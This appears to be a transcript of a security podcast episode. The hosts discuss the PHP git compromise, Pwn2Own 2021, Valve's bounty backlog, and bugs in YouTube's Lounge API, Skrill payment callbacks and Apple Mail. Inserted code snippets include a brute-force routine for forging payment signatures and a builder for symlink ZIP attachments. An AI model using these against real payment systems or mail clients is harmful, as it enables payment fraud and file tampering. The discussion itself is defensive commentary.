Episode 72 - Transcript

Pwn2Own, Linux Kernel Exploits, and Malicious Mail

This transcript is automatically generated; there will be mistakes.
Specter
Hello everyone. Welcome to another episode of the Day Zero podcast. I'm Specter, with me is zi today. We've got some interesting topics for you all: we have an update on the PHP compromise, Pwn2Own 2021 results, and some various fun vulnerabilities. So let's jump into the PHP git instance takeover update first. If you remember from the last time we covered this, two weeks ago I believe, the PHP developers announced there were commits pushed into their git instance that they did not author, but that came from their accounts. The PHP developers stated that they believe the git server itself was compromised and not just a user account, which they elaborate on a little bit here, talking about how a commit was first made under Rasmus' name, then another one under Nikita's name. So it seems kind of unlikely that both accounts would have been compromised independently. So yeah, there's a little bit more information on that now. They ended up discovering that the attacker pushed the commits using HTTPS and password-based authentication, which the developers weren't even aware was possible to do, since they use SSH and key-based authentication, which is a lot stronger. So yeah, it seems somehow the attacker got the passwords to those git accounts in order to make those commits. They think it was possible from compromising the master.php.net system, which is like their management system for tasks and authentication and all that stuff. They note that that's been running very old code on a very old PHP version, and it used HTTP digest auth, which is basically like plain MD5. So they believe that's how it happened. They don't know for sure though; it seems there's a little bit of uncertainty as to exactly how the attack occurred.
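For context on the digest auth point: in standard HTTP Digest (RFC 2617), the server stores or computes HA1 = MD5(username:realm:password), so a leaked credential database is effectively a pile of fast MD5 hashes with no real work factor. A minimal sketch of that computation; the username, realm, and password values below are made up:

```python
import hashlib

def digest_ha1(username: str, realm: str, password: str) -> str:
    """HA1 as defined by RFC 2617: MD5 over 'username:realm:password'."""
    return hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()

# Hypothetical values, only to show the shape of what the server ends up holding.
print(digest_ha1("someuser", "master.php.net", "hunter2"))
# Checking a candidate password against a leaked HA1 is a single fast MD5 call,
# which is why digest auth gets compared to storing plain MD5 hashes.
```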
zi
But some of those details seem a little bit odd, like the main thing being that the attacker apparently needed to guess at the usernames. Which then indicates that, you know, if they had a compromise of the credentials, they wouldn't really need to do much guessing; they should just know what the usernames are. So that kind of throws a wrench into the idea that it was just the master.php.net user database that was compromised. Like, that's the thing that actually seems really weird to me: the fact that they apparently had credentials but not usernames, but then they were able to match the username to credentials. So it seems like there could have been some sort of exploit specifically in the authentication perhaps, where first they find the username and then they're able to bypass the authentication once they know the username, without actually providing the
Specter
password. That is a fair callout, because that would kind of match up with what we were speculating on, with it potentially being a bug that somebody wanted to offload and couldn't, just based on the comments that were made in the "malicious" (in quotes) commits. Because I don't think they did anything super serious, but, you know, it introduced, like, attacker-controlled text and it mentioned Zerodium. So yeah, I mean, that would kind of match up with that idea. And yeah, that part of the story is a little bit strange to try to wrap your head around. So
zi
yeah, it just doesn't make sense to me. I mean, I guess that's kind of the story they're going with; perhaps, like, they're not holding hard on the fact that that was what was compromised, just that it's their running theory, which is
Specter
fair. They just don't have all the information that they want. Yeah, but that's just, you know, gonna happen.
zi
Yeah, well, especially if they're running an old system, I'm doubting they were collecting a lot of information to actively be able to determine whether or not somebody got in, or to do the proper incident response, I guess I'd
Specter
say. Yeah, so what they've done is they've migrated the master.php.net system to PHP 8. They now use bcrypt for passwords, and reset passwords obviously, and they moved towards using parameterised queries to be more resilient against SQL injection attacks. I
zi
mean, I'd be surprised... I'm surprised that they wouldn't have been doing that already. I am disappointed that they are killing the Subversion support, though. Subversion has, you know, a place in my heart, so the fact that it looks like it wasn't meant to stay... yeah, well, whatever. But yeah, they're taking some steps to resolve it. That said, some of this seems like it really should have been done beforehand, like especially just running the old server. I mean, it doesn't take much to do your updates. Yeah, that said, we don't know how outdated it was. Yeah, so this was a nice,
Specter
like, transparency report. But like we've kind of been hinting at here, this doesn't really reflect too well on PHP, right, admitting to using older code and older versions on the management system, and it probably being easy to compromise. It
zi
reflects well in the sense that they're being open about it. They're not necessarily trying to downplay it, they're just sharing kind of what their guesses are. Yeah, and I can appreciate that. I'd always rather see a company being open about it rather than trying to hide it. So I do appreciate the update regardless, and it sounds like they're at least taking some of the right
Specter
steps. Exactly. Basically, to sum up the story: some of the stuff said in here is a little bit concerning, but this level of openness and the steps that they've stated they're going to be taking are generally in the right direction. So, you know, a bit of concern but also a bit of hope, I guess, coming out of that post. But we still don't entirely know what the reasoning was behind the compromise, and we probably won't ever, honestly, unless the attackers outright come and say it or something. So yeah, we'll move on. Pwn2Own happened last week and there was a lot of cool stuff that came out of it this time around, thankfully. Those who have been watching for a while may remember I wasn't too thrilled about the last one, just because of the target selection. For those who don't remember, the last Pwn2Own was, I believe, Pwn2Own Tokyo in Toronto. It was what's supposed to be the mobile Pwn2Own, but there were a lot of IoT targets in there and basically nobody went for the mobile devices; it was all routers and TVs and stuff, which was a bit depressing honestly. But this Pwn2Own has a lot of cool targets in it and hopefully some cool exploits that we'll see out of it. So I will quickly say one thing: there were a lot of people that were looking at Pwn2Own and talking about it and asking when we'll see the issues come out of it. So Pwn2Own is basically an event where researchers submit stuff and the vendors get it patched. We typically don't see vulnerabilities out of Pwn2Own for months; usually they come out in the form of blog posts several months down the line from ZDI, a lot of which we cover on the podcast, but it's not something you're going to see like a week after the contest or something. There's quite a bit of time lag between the competition and when you see what was done from the outside. But yeah, some of the targets that were hit were really cool. Again, this Pwn2Own was virtual; it spanned across four days instead of the two or three that are more common, kind of taking advantage of that virtual aspect. Some of the targets owned included Safari, Chrome, and Edge. One of the exploits worked on both Chrome and Edge, which was really cool, and funnily enough I believe somebody dropped a PoC for that bug today, from what I saw on Twitter. I'm not entirely certain if it's the same bug that was submitted at Pwn2Own, but judging by the discussion it seemed like it probably was. So, you know, I said that usually it's several months before we see stuff from Pwn2Own, but there might have been a case of collision where you might be able to see one of those bugs already, and we'll probably cover that next week, because obviously I saw it like 15 minutes before we came on for the podcast, so I did not have time to look through it really. But yeah, there was also some MS Exchange Server stuff from DEVCORE, virtualization stuff on Parallels and VirtualBox, and a few Ubuntu LPEs. Unfortunately there were quite a few partial wins, five overall, which there was a bit of discussion around, as there often is, around whether or not it's fair to only accept partials. And the reason that a lot of those bugs were partials is because the bug was, quote, already known to the vendor or ZDI, and there's a bit of discussion around that, because from the researcher's point of view there's no way they could have known that the vendor already knew about it if they haven't patched it yet.
And then, like, that sucks, right? They put all this time into writing an exploit, all for the vendor to say, yeah, we knew about this issue, so no money for
zi
you. So in fairness I will also say, or at least to get ahead of the usual claims that, you know, the vendor could be lying: one, ZDI has been doing this for quite a while, and two, the vendor does have to show ZDI in their internal bug tracker that they have the report for this bug, and they have a set amount of time to actually go and find the bug report for it. So it's unlikely that the vendor is going to be lying about it. It's a lot better than what you might see over at HackerOne, where less evidence needs to be provided. That said, I mean, this is also kind of the same deal as, you know, with a normal bug bounty: somebody has a duplicate report, they don't get paid on it at all. Or, well, it depends on the actual bounty program; most bounty programs don't pay out on duplicates. This is basically no different than
Specter
your standard bounty program. And I
zi
agree that, like, it's a bit of a problem, because obviously researchers are putting all this time into it, and then it sucks, like, you lose it all because of it being a duplicate, and because they're holding off on the report until they actually use it at Pwn2Own. Which means, like, if it's reported, you know, the day before Pwn2Own, that sucks a little bit more.
Specter
Yeah, that really sucks. That's very unlucky if that happens. That said, I can kind of tie that to a point somebody brought up from chat, exponent, talking about the worst rules: the one that allows vendors to patch the application right before the competition. Yeah, that is really shady, and I don't really agree with it. But there definitely have been cases of vendors patching their products the day before, and honestly, when you do something like that, it does seem like you're intentionally just trying to screw over the competitors who are well on their way through trying to get paid out.
zi
Or also making sure that any of the bugs they know about are not going to work. Yeah, I think that's fair on the vendor side too. I mean, it sucks on the researcher side, and I think we really just need a solution to the whole duplicate or already-known vulnerability issue; I think that's where things need to come down to. I don't think we should be faulting the actual vendors for trying to patch their systems before it, or trying to make sure it's as secure as possible prior to it. If they are doing that, I don't think that should be a huge issue; that I don't think is a bad thing. I just think we need a solution on dealing with the duplicates and stuff. So part of
Specter
why vendors do that, I don't really know, but I know some vendors use Pwn2Own as an actual, like, indicator of how well their security stance is doing. Like, did we get popped at Pwn2Own this year? That's kind of how they think about it. So if they can patch an issue before it gets exploited at Pwn2Own, then that kind of, you know, makes them feel a bit better about it, I guess. I do kind of take issue with patching the day before. I do agree that to an extent that kind of comes with the turf, right; with this kind of contest you're gonna have to land on one side or the other, being the vendors or the researchers, and whatever side you choose is going to make the other one mad, and collision and whatnot is the nature of doing exploits. But patching the day before has always kind of rubbed me the wrong way, honestly. But yeah, I mean, that said, I've seen that reason being cited for potentially changing the way Pwn2Own works, you know, which I don't know if I fully support. Like, one of the ways that I've seen being suggested for dealing with the issue is not requiring full-chain exploits, right, so that way even if you have collision, or if the vendor has already seen the bug, you're not wasting as much effort developing a full-chain exploit; it's just the bug is burned. Well, I don't know if I really support that, because I am fond of the way Pwn2Own works with the exploit aspect; I don't think I'd want that taken away necessarily, because unfortunately it is kind of limited, the amount of avenues you have on the exploit dev angle compared to the vuln research angle. But yeah, I have seen that argument kind of brought up, that maybe ZDI should change some rules or change the way that it operates a bit, because there were some unhappy people for sure. I mean,
zi
you know what the thing is, you can report any bugs to ZDI without a proof of concept, without taking part in Pwn2Own. I think having the full exploit is part of what makes Pwn2Own interesting; it's part of what actually makes it a challenge. It's not just "oh, I've got this crash that's probably exploitable", it's actually exploiting it in a dynamic environment. And having even the updates happening just before it means your vulnerability or your exploit needs to be able to withstand having an update, having some changes, or you need to be able to change it on the fly within a few minutes. I mean, that feels like part of the contest to me, not something that should be removed.
Specter
Maybe that is why... sorry, go ahead. Oh,
zi
yeah, I was just going to reiterate: if you want to just submit a proof of concept, you can do that directly to ZDI. I believe they'll offer a bit less, but you can do
Specter
it. So that's what I was going to get into. That is what you were saying with the exploitability aspect; that is partially why Pwn2Own also pays so much more. Now, I think "a little bit less" is an understatement from what I've heard about the ZDI payouts. Yeah, because some of the browser bugs and stuff that were found in this competition were being paid like $50,000, whereas if you submitted them to ZDI it's probably closer to the neighborhood of, like, under 10k, I would assume, from the limited information I know. It is a little bit hard to say because payout amounts and stuff are not disclosed for a ZDI submission, sorry. But yeah, with ZDI you are getting quite a bit less, but like zi said, you have a lot less of a work burden put on you as well, so, you know, there's trade-offs there. Yeah, in terms of results, first place this year funnily enough was a three-way tie between DEVCORE, OV, and Computest, all at 20 points. DEVCORE actually made that 20 points with just one submission, the Exchange server attack, with Jack Dates following at 14 points and then Team Viettel, I think is how you say it, at eleven and a half points. So yeah, the competition was more fierce this year than we saw at the last event, and overall just some of the targets hit were really cool. I will say the live stream, where they were doing discussion between attempts and live-streaming the attempts, was a bit disappointing for me personally when trying to see one of the attempts. Like, I was looking at the Ubuntu LPE basically, and when I tuned into the stream and they switched over to the competitor, they were already at a root shell, like they had already run the exploit. So it felt kind of weird to me, like, why stream that if you're just kind of streaming a root shell? I do kind of get that they don't want information leaking about the exploit before it's fixed, but, like, you can control what you print on the screen when you run an exploit, so...
zi
That would start putting the onus on the exploit devs though, to make sure that their output is clean. I mean, especially because they may need to debug the exploit on the fly, right, as they're doing it. They're going to want that information getting printed, which is going to expose a lot of information, probably expose information about how the exploit actually
Specter
works. Yeah, it's honestly just like a personal thing where I was, like, really disappointed. I was hoping to see just something, you know, like run the command, see a bit of ASCII art and then a root shell. Just going straight into a root shell is just a bit, I don't know, disappointing to me, but that's just a personal thing. I totally get why they do it that way. But yeah, like I was saying before, this was just all around a really good event, I think, judging by the targets that were hit and the results.
zi
So yeah, definitely more interesting than the last one we
Specter
covered. Yeah. Did Fluoroacetate retire? I do not know; they did not participate in this competition as far as I could see. I don't know why exactly that is. I believe a lot of Fluoroacetate's targets last time around were in the IoT stuff, so it's possible we'll see them again in the IoT space if ZDI has an IoT-oriented event this year, which I think they probably will, but we'll see. But yeah, we'll move on to some drama, as, you know, we like to do sometimes. There's been some drama around Valve and their HackerOne program. Secret Club put out a tweet that they found multiple vulnerabilities in the Source engine, which is the basis for Valve games including CS:GO and TF2 and a variety of other games. One of the issues they talk about, well, they didn't really talk about the issue itself on Twitter, they just kind of mentioned that they found one and posted a brief video of the PoC running, but one of the bugs they found was reported two years ago and was an RCE that functioned just through the Steam invite functionality. And there were also two other RCEs which could be launched from community servers. And understand, these RCEs do have some significant impact, right? They can be used to run spyware on a target PC, steal banking information or credit card info, as well as skins, which, for those who are familiar with CS:GO, do have quite a bit of monetary value. And these issues have been untouched for months or years by Valve; like I said, one has been going unfixed for two years, and the other two for an unspecified number of months and for five months. So this Dexerto post does a good summary on it. I do think it's a little bit overdramatic saying that you might have to stay away from the game; I don't think that's true necessarily. But I mostly just wanted to use this as a catalyst to ask: why does Valve even have a bounty program? I really don't understand,
zi
because we've covered them paying out bounties before, so it's not like they don't pay out any bounties. Yeah,
Specter
so... but this story is not the first time I've heard of Valve just leaving reports sitting in limbo for months on end. Like, absolutely, Valve has closed reports in the past and paid out; I'm not saying they're not paying researchers,
zi
but they're not paying researchers in a timely manner.
Specter
Well, not only that, they're not even triaging reports in a timely manner. So it's not only kind of screwing over the researchers, who might want to talk about the research and get a payout; it's also screwing over the customers, who could potentially get hit by these attacks, because they're just leaving them for months. And yeah, it just feels really... like I said, I side with the researcher, especially because it's not only about getting paid. Sometimes you want to share your research and you want to share your findings and do a blog post or write-up, and you just can't do that while it's stuck in limbo in the bounty program. And yeah, I don't know what it is with Valve when it comes to fixing bugs, whether they be these RCEs that we're talking about or some other bugs. Like, there were some bugs that affected competitive integrity recently, like smoke bugs and the infamous coaching bug that got a bunch of coaches banned by ESIC a few months ago. It just seems like Valve doesn't really care that much; they only fix them when they have no other choice or when they're just bored or something. I don't know, there doesn't really seem to be any strong incentive to fix these issues on the Valve side; saying they're not proactive would be an understatement, they're not even really reactive to these reports. So yeah, I don't really know what's going on at Valve. But if they're going to continue doing this where they just leave reports in limbo, just pull the bounty program. I feel like it's a waste of everyone's time and effort at this point. Like, I feel really bad for researchers who put months of their time into finding a vulnerability, exploiting it, and then it just sits there forever on a shelf. Like, just... why... just don't run a bounty program if you're going to do that. And their bounty program comes through Hacker-
zi
One, and this is one of those things I've talked a little bit about before, but I feel like HackerOne is in a position to actually move companies to have an increasingly more mature security program. And I've talked about it before when it comes to disclosures, like, at first allowing companies, you know, to not disclose, and then leading them along or even requiring them to start disclosing vulnerabilities. And this is kind of something too, where just the time to triage, especially if it's taking that long... It's getting passed from the
Specter
HackerOne triagers
zi
to the Valve triagers to then kind of, like, verify, and that's probably where the issue is happening. I can't imagine HackerOne is actually taking two years to pass it over to Valve. No way, like, I can't imagine that being the case. So this is also one of those cases where I think Valve, or sorry, HackerOne could consider introducing, like, a requirement on how long it takes to triage certain things. I mean, obviously there can be exceptions, but setting kind of certain expectations of their clients. Also, I feel like HackerOne is in a great position to be able to push something like that forward. They're not going to do it; like, that's not good for business, to push a business beyond what they want to do, so I guess they won't do that. But they're in such a good position to improve the security of a lot of things, of a lot of companies, that I kind of wish they would start using that position.
Specter
Yeah, I agree. I think that would be a good move on their part. And yeah, that's kind of the only reason that Valve does what they do, right: they can get away with it. They can get away with running a bounty program without any level of expectations on the vendor side. So yeah, that's a good suggestion, I like it.
zi
You know, I'll say one other thing, kind of in fairness here: we don't have details about how this exploit works, or why they might not have paid it out or decided not to, or why they may not have triaged it. So, not triaging it, actually, I can't think of a plausible reason for that not to have occurred; triaging should have happened. If they just didn't pay it out, that's a little bit different. But at the same time, without details, we don't know what the complexity could be, and we can't even really speculate on that.
Specter
Yeah, I mean, if they received the report and then they decided, okay, the circumstances of this, like, yeah, it's an issue, but it can't really be used and we're not going to bother paying for it, and then they close it, that would be different, right? Because then, okay, it's closed, you don't get a payout, which might suck, but if Valve doesn't really consider it much of an issue, then you can talk about it and you can release your research if you want to. Whereas if they just leave it sitting in triage, it's like you never even really discovered it, because you can't
zi
talk about it while it's stuck in that limbo. Yeah. Yeah,
Specter
and that's another point. Yeah, a viewer in chat says their big payouts are a siren call, and yeah, that's what attracts a lot of people to the Valve HackerOne program. For one, it's binary, which you don't always get to see on HackerOne, a lot of them are web, and the payouts are big. Like, you're talking about a 10K payout for an RCE in Source engine from their payout table. So yeah, it's a nice payout and it's a cool target to look at, but it's just ruined by how badly the bounty program is run. So yeah, it's just a really unfortunate situation all around, I think. But yeah, we can move on to our exploits section of the show. So, YouTube exploits are back from xdavidhu. We've covered being able to get snapshots of private videos from users, and being able to get into a user's private special playlists, like their uploads and likes and whatnot, which were the past two issues. Both of them required some special circumstances to exploit though, namely needing the video or playlist IDs. This one though is a much more practical attack, and this is a new set of issues, because it basically just involves getting a victim to visit a malicious link, effectively, due to a CSRF issue. So with YouTube, you can use it on smart TVs and whatnot, and YouTube has an API in order to provide remote control, to play it on a TV or do whatever else, and that's called the Lounge API. The way they detect that you're a TV is pretty simple, it's just a simple user agent string check, since the YouTube TV apps use Cobalt, which is like a lightweight browser for those types of applications. The main problem is that the Lounge endpoint doesn't have any CSRF protection. So an attacker can send a request to that endpoint on a user's behalf from a malicious website to get a lounge token, which can then be paired with an attacker's device, and that can lead to compromising both unlisted and private videos that a user has in playlists. For unlisted videos, the attacker gets the IDs and they can just steal those to view the videos, since the ID is effectively like the password for the video, and private videos can be played as well, according to the blog
zi
post. I'm not entirely sure how that works; that
Specter
should be bound to the account still.
zi
So the way that worked is, with the Lounge API, you actually have a graph on here, I think, kind of showing it. Yeah, so the user would send a request, like, you know, "play this video" to the Lounge API. They did include that lounge token that was mentioned, they did include that with it, and then the TV itself is doing long polling against the Lounge API, and it's looking for "are there any new commands for me", and it's like, yeah, okay, play this video. And so when the user asked to play that video, I'm not sure if the user was also including it, or if the Lounge API created the token, but there was a CT token. So when the TV goes to play a video, it'll go and get the video information, against, like, an endpoint, /get_video_info, and it'll include the video ID and this token that it received from the Lounge API that is specific to the video. So that is kind of the authentication or authorization token that needs to be passed through. Without that, so without the legitimate user, who is allowed to access the video, providing that CT token and then passing it over to the TV, you wouldn't be able to just play the video. So that's where the CSRF comes in. You're able to make requests that are authenticated as this user to the Lounge API, and it will be authenticated using their cookies, like we said, CSRF, so when they say play that video, it'll work. And then to get more videos, we've talked before about, not really an issue, but the predictability of some of your playlists, those kind of built-in playlists like your liked videos and specifically your uploads playlist. And instead of playing a video you could also do, like, play a playlist. So combining that, you can kind of predict what the playlist ID is going to be for the uploads, and that's how you can kind of leak all of the private videos without actually knowing any of the private video IDs, by predicting what their playlist ID will be.
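As a side note on that playlist predictability: the auto-generated uploads playlist has historically been derivable from the channel ID itself by swapping the leading "UC" for "UU". A rough sketch of that transformation; the channel ID below is made up, and the write-up's exact derivation may differ:

```python
def uploads_playlist_id(channel_id: str) -> str:
    """Derive the auto-generated 'uploads' playlist ID from a channel ID.

    Channel IDs start with 'UC'; the corresponding uploads playlist has
    historically just swapped that prefix for 'UU'.
    """
    if not channel_id.startswith("UC"):
        raise ValueError("expected a channel ID starting with 'UC'")
    return "UU" + channel_id[2:]

# Made-up channel ID, purely to show the prefix swap.
print(uploads_playlist_id("UCabcdefghijklmnopqrstuv"))  # -> UUabcdefghijklmnopqrstuv
```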
Specter
Yeah, and that was on the last issue we covered. I wish I had the episode number on hand, I actually should have went and got that but I forgot to, but we did talk about the ID structuring and how that all works in David's previous blog post on that, if you want to see more around that particular issue. But yeah, this blog post goes pretty long into the story of how this was discovered and the thought process behind it. He talked about how he thought of it after a private video played at a friend's place on their TV app, without the TV being signed into their account, and talked about how they built their own TV application that makes the necessary API requests to pull off the attack, spoofing a TV basically. So yeah, awesome attack.
zi
So he ended up getting... I do want to pull one question over from chat first, from free SRX: what can a malicious party do with knowing users' private videos and playlists? The main thing there is, you can imagine, like, certain brands will have some private videos, or perhaps, you know, somebody that just uploads some private videos for themselves. So this is going to be a targeted attack; you do need to predict that playlist, so you can't just generically run it against anybody. But basically, you know, you're just getting a leak of all of their private videos. Well, all of their videos, but that includes the private and unlisted ones. So my thing would be, you know, business intelligence I could imagine it being used for, in that sort of case where you're able to get somebody who manages a brand. Yeah. Someone else in chat also mentions bug bounty proof-of-concept videos would be another example. There are definitely some sensitive videos people upload; you'd have to be targeting them specifically, but there definitely are things you can kind of pull out with this, for sure.
Specter
Yeah, so the researcher ended up getting a six thousand dollar bounty for it, and it's cool because it has a similar impact to some of the previous attacks in terms of what can be accomplished. And actually it's even more impactful, because in the previous attack on private videos they just managed to get snapshots, not the actual video playback. You didn't get, like, the, you
zi
know, the audio or
Specter
stream, and you didn't get the audio. Yeah. That
zi
said, I do love that, using the thumbnails to rip the video, I do like that attack. I thought that was a cool way to go about it, grabbing the thumbnails. I don't remember what episode we talked about it on, but basically it grabbed the thumbnails using, it was one of the advertiser APIs or something, where you could add a video and it would show the thumbnail or something. It was a separate application that just interacted with YouTube, so it didn't have the same privilege checking. Yeah, I thought it was a really cool attack, and this one as well. I guess it's not really the same vein, but yeah, I've actually liked all of this researcher's posts, they've all been some interesting YouTube
Specter
bugs. Yeah, cool bugs and well-written posts. And yeah, this one's like the most practical one that we've covered so far, I think, so it's a good addition. Up next, we have an interesting issue in a sensitive website, let's say a support site, which makes the issue all the more problematic, because the issue is basically an endpoint that apparently allowed you to steal all account information, such as email and password, and the passwords were only protected with MD5. We don't really have many of the specifics, it is a limited disclosure, but if there was one type of website you wouldn't want your email, especially, and your password leaked from, I think it would be this kind of site. The issue itself is a little bit old, it's from March of 2019, but it was just disclosed April 6th. They ended up getting a $5,000 bounty for it. I will say, I am not totally sure how you accidentally expose an endpoint that discloses account passwords; it must have been a debugging-based endpoint or something. That is really strange. Well,
zi
another option is, if you set yourself up an endpoint that is just, like, user information and it just dumps everything. Like, imagine a profile endpoint that gets a JSON response or something, and in that response it basically just dumps whatever it has in the user's row in the database or something. That could then include the MD5 password along with email and everything else, and then the UI will decide what to display. I'm not saying you should implement a profile that way, but I have absolutely seen things like that being
Specter
done. Yeah, the other thing that you mentioned was MD5. MD5 in
zi
2021... I mean, there's no reason for it. We did actually just talk about the PHP thing where that was using Apache digest, well, I guess technically just HTTP digest, whatever, where that also kind of had MD5 a little bit. Basically, if they're doing digest, it's at least a little bit more complicated than just the hash of the password, whereas in this case it seems like they literally just hashed it with MD5. There's no mention of a salt here either, which is even worse.
Specter
Yeah, I mean, if they really wanted to protect passwords, they should have just hashed them with CRC32. I mean, that was a joke, just to be clear.
zi
CRC32 for the win, you know, very
Specter
strong, very, very strong.
zi
But on a more serious note, if you are doing passwords, I often hear people, this is kind of a side topic, but even some security people, or at least beginners, saying, like, oh, just, you know, hash and salt. And these days, no, you need to do more than just hashing and salting. I won't go into the details here, but basically defer to somebody else, or defer to a library that specializes in dealing with passwords; you shouldn't be calling the hash functions yourself, ideally.
Specter
If you're using something like PHP, it has password_hash, which salts it for you; it has a solid API for doing that as well. So yeah, just use better, like, use better hashing. It seems like this site wasn't designed in a very smart way, although I don't know, I don't know how old it is.
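To make the "use a real password hashing API" point concrete, here is a minimal sketch using Python's standard library PBKDF2, roughly the spirit of what PHP's password_hash gives you. The iteration count is illustrative, and a dedicated library (bcrypt, Argon2) is usually the better choice:

```python
import hashlib
import hmac
import os

def hash_password(password: str):
    """Return (salt, derived_key) using a slow, salted KDF instead of bare MD5."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, key

def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return hmac.compare_digest(key, expected)  # constant-time comparison

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
```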
zi
I was just surprised to see MD5 in this
Specter
year. Yeah, you're in, like, that "what year is it?" meme. So we also have a post about instant payment notifications, or IPNs, and issues between the vendor checkout page and the payment processor, being a UK-based one called Skrill, and its use on two gambling websites.
zi
So they go into a
Specter
bit of background about how the authentication flow, or how the flow works, between the vendor checkout and the payment processor, and what happens in between those stages, talking about how Skrill will generate an MD5 signature as an authenticator for a transaction. That MD5 signature is generated using several bits of information, including the merchant ID, the transaction ID, and all the payment information that's attached to the transaction, as well as an MD5 hash of the developer secret. By the way, I don't know what it is with MD5 today, it seems to be one of the show themes. One issue is around the developer secret, being that the plaintext that gets hashed can only consist of lowercase alphanumeric characters, with no special characters allowed, and it's limited to 10 characters long. It's like the opposite of what you want for a secret. Yeah, my
zi
secret word, 10 characters, sounds good. I mean, it's not too many characters.
Specter
So like the 10
zi
So, like, the 10 characters is... I mean, it's not good, but it's not as bad as the fact that they all have to be lowercase with no special characters. Excluding uppercase, excluding special characters, 10 characters, like, it's not great, but it's not terrible. But anyway, because of that, you can probably guess where this is going: if you're able to leak some of this other information, such as the merchant ID and the transaction ID that it comes up with, which they talked about doing by modifying the status URL, so basically the URL that's used as a callback, which isn't always going to be the case, it depends on how they're actually set up, but in the case of a couple of these casinos they were able to control that status URL, that then allowed them to kind of leak some of this information. So they can then go ahead and try to brute force and figure out how the MD5 signature was actually generated, and then, as you can kind of guess, they could spoof that reply and make it seem like... say they're not checking if the IP is correct or if it's coming from the proper domain, just "we got this request, it has the right MD5 signature, hey, they must have sent us $25,000, totally legit." It basically just lets you spoof payments. Definitely a fun attack. His bounty, unfortunately, was not the $25,000 that he pretended to send in, but instead $10,000, which, it's definitely a very damaging
Specter
issue. Yeah, basically the main problem there, though, is the entropy, right? Your entropy is far too low with those restrictions on the password. He ended up reporting the issue to the gambling companies and advised them to generate the transaction internally and validate the transaction details from the Skrill servers before processing them. He also states they should use "better passwords", in quotes, though I will be honest, this point kind of confused me, I don't really understand what he means there. The password issue, from what I understand, is an issue on Skrill's side, not the gambling websites'; it's Skrill that imposes those restrictions. We don't know what
zi
password he actually came across. Perhaps they did have a fairly weak password even within that 10 character limit, like maybe it's their name or something, but we don't know that. That said, yeah, I do think that is more a Skrill issue, that they should allow more than just 10 lowercase characters. Yeah.
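To put rough numbers on that restriction: 10 characters drawn from lowercase letters and digits is a keyspace of 36^10, about 3.7e15, at the absolute best, and far smaller if the merchant picks a word, which is comfortably within reach of GPU-accelerated offline MD5 search once the other signature inputs have been leaked. A sketch of the idea, using a completely hypothetical signature layout rather than Skrill's actual field order:

```python
import hashlib
import itertools
import string

ALPHABET = string.ascii_lowercase + string.digits               # 36 symbols
print(f"max keyspace for 10 chars: {len(ALPHABET) ** 10:.2e}")  # ~3.66e+15

def forge_secret(known_fields, target_sig, max_len=4):
    """Brute-force a short lowercase secret given leaked fields and the observed MD5 signature.

    Hypothetical layout: sig = MD5(known_fields + MD5(secret)). Real IPN schemes differ;
    this only illustrates why a low-entropy secret falls to offline search.
    """
    for length in range(1, max_len + 1):
        for combo in itertools.product(ALPHABET, repeat=length):
            secret = "".join(combo)
            inner = hashlib.md5(secret.encode()).hexdigest()
            if hashlib.md5((known_fields + inner).encode()).hexdigest() == target_sig:
                return secret
    return None
```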
Specter
That's one of those things where it just makes sense to strengthen your security on all the angles you can, and basically force your clients to use secure secrets. So yeah, cool attack though, and it kind of played on multiple issues, right, that issue of low entropy and also not internally handling the callback stuff. Alright, so our next one is a zero-click in the Apple Mail application on macOS. It's related to compression, and more specifically automated decompression of attachments that are sent from other Mail users. So when you send email in this Mail application, attachments can get compressed, right, and then it puts in the MIME headers to let other macOS Mail clients know that, hey, these attachments are compressed, so when you receive the email it just decompresses them so that they're readily accessible for the other user, and it uses ZIP for the compression. The problem is relatively straightforward: bits of uncompressed data are not cleaned from the temporary working directory, which is also not unique between runs. So an attacker can basically establish symbolic links in the temporary directory, pointing to other files, with a malicious compressed attachment, and then send another attachment which will utilize that symbolic link to do something damaging, like write to an arbitrary file, for example. Now, you are restricted to the Mail temporary directory, but there are still some interesting things in there, such as the mail rules list, which is one that they hammer on in this blog post. The author points out you could add an auto-forward rule to leak email data, or it could potentially be used to leverage another bug to chain with for a better compromise, though that is theoretical; they just kind of touch on that as a quick throwaway point, they don't have an example of an attack surface you could take advantage of, but that possibility is there. So yeah, not a super complex issue; it's mainly just the fact that the files that are decompressed are not cleaned up between runs or between instances, I guess. The timeline was fairly reasonable: the issue was reported May 16th, 2020, Apple shipped a hotfix in the Catalina beta, I believe on June 4th, and then to the supported stable versions July 15th. So within a month or two.
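To illustrate the general symlink-in-an-archive primitive being described (this is not the author's actual proof of concept): a ZIP entry can be marked as a symlink via the Unix mode bits in its external attributes, and a naive auto-extractor will happily materialize the link. A sketch in Python:

```python
import stat
import zipfile

def add_symlink(zf: zipfile.ZipFile, link_name: str, target: str) -> None:
    """Store `link_name` in the archive as a symlink pointing at `target`."""
    info = zipfile.ZipInfo(link_name)
    # ZIP keeps Unix mode bits in the high 16 bits of external_attr;
    # S_IFLNK marks the entry as a symbolic link.
    info.external_attr = (stat.S_IFLNK | 0o777) << 16
    info.create_system = 3  # 3 = Unix, so extractors honor the mode bits
    zf.writestr(info, target)  # a symlink entry's "data" is just its target path

with zipfile.ZipFile("attachment.zip", "w") as zf:
    # Hypothetical target path, only to show the shape of the trick.
    add_symlink(zf, "notes.txt", "../some/other/location")
```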
zi
But yeah, I will say this is a bit weird to me. I would
Specter
expect the temporary files to get cleaned up, but I don't know if it's, like, a logic bug where maybe some of them got cleaned up but certain types of files didn't. But, well, yeah, there wasn't much elaboration on that. It could kind of be a
zi
situation where it cleans up, but only once it's done processing the entire message, or all the attachments, or something like that, rather than doing it with every single attachment. Because, sort of, in theory, under normal circumstances you wouldn't be overwriting any files, because you wouldn't have two attachments of the same name; it's just because it does the auto extraction that you kind of run into this. Yeah. So I mean, it's one of those classic issues just with zips, and also having the symlinks inside of the zip, or inside of the compressed container.
Specter
